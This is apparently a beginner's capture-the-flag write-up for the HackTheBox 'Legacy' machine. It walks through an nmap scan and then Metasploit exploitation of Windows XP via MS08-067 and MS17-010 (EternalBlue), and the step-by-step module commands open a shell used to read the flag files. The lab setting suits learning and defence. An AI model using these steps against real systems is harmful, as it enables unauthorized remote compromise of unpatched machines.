I know this is an oldy but I’m learning here and I wanted to know more about Metasploit. I have found 2 Exploits for this Legacy machine on hackthebox and going to explain both of them. I’m using Metasploit to exploit this machine.
Using Exploit 1 on Legacy
Start an nmap scan
Nmap -T4 -A -p- 10.10.10.4
We see port 445 is open and we see a windows XP machine. With a bit of googling you will come across MS08-067
This is from rapid7 so this is probably in Metasploit
Start up Metasploit by typing
msfconsole
search MS0867
Type use 0
Options
Fill in all te requirements (RHOST and LHOST)
set RHOST 10.10.10.4
set LHOST <YOUR MACHINE IP>
If all is filled in type
RUN
Now you can navigate to the users desktop and administrators desktop to get the flags for user and root. Remember this is a windows machine so use type flag.txt to output the content of a file to the screen
Using Exploit 2
It is a legacy system and there for probably vulnerable to the ethernal blue MS17-010
Open the msfconsole by typing msfconsole in the terminal
Type in
search MS17-010
For most of them we need the host to be x64 except the psexec one. Type in
use 4
options
set RHOST 10.10.10.4
set LHOST <YOUR MACHINE IP>
As you see I needed to run it a couple of times to get the shell. If you do not get a shell then reset the box. It should popup in a coupe of tries
This conclude hackthebox Legacy with metasploit . Now we all know how important it is to update your operating systems. This more or less confirms it.
